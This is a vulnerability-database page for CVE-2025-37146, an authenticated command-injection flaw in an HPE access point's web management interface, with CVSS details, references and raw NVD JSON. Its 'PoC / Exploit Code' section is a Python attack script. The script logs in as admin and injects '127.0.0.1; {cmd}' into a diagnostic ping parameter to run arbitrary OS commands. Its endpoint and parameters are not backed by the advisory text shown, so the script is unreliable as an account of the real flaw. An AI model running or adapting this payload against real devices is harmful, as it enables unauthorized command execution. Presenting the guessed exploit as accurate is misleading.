CVE-2025-37146

Description

A vulnerability in the web-based management interface of network access point configuration services could allow an authenticated remote attacker to perform remote command execution. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HPE网络接入点配置服务（具体版本请参考HPE官方安全公告hpesbnw04958en_us）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-37146 PoC - HPE Network Access Point RCE
# Vulnerability: Command Injection in Web-based Management Interface
# Requirements: Authenticated session with high-privilege credentials

import requests
import sys

TARGET_URL = "https://<target-ip>/"
USERNAME = "admin"
PASSWORD = "<password>"

def exploit(target_url, username, password, cmd):
    """
    Exploit command injection in HPE Network Access Point
    configuration service via web management interface.
    """
    session = requests.Session()

    # Step 1: Authenticate to the web management interface
    login_url = f"{target_url}/login"
    login_data = {
        "username": username,
        "password": password
    }

    resp = session.post(login_url, data=login_data, verify=False)
    if resp.status_code != 200:
        print("[!] Authentication failed")
        return False

    print("[+] Authenticated successfully")

    # Step 2: Inject command via vulnerable configuration endpoint
    # The command injection occurs in diagnostic/configuration parameters
    config_url = f"{target_url}/api/config/diagnostic"

    # Inject OS command using shell metacharacters
    payload = {
        "host": f"127.0.0.1; {cmd}",
        "action": "ping"
    }

    resp = session.post(config_url, json=payload, verify=False)
    print(f"[+] Command execution response: {resp.status_code}")
    print(f"[+] Response body: {resp.text}")

    return True

if __name__ == "__main__":
    cmd = sys.argv[1] if len(sys.argv) > 1 else "id"
    exploit(TARGET_URL, USERNAME, PASSWORD, cmd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-37146
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-37146
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-37146/
[4] VulDB https://vuldb.com/cve/CVE-2025-37146
[5] https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04958en_us&docLocale=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-37146", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:41.633", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the web-based management interface of network access point configuration services could allow an authenticated remote attacker to perform remote command execution. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04958en_us&docLocale=en_US", "source": "[email protected]"}]}}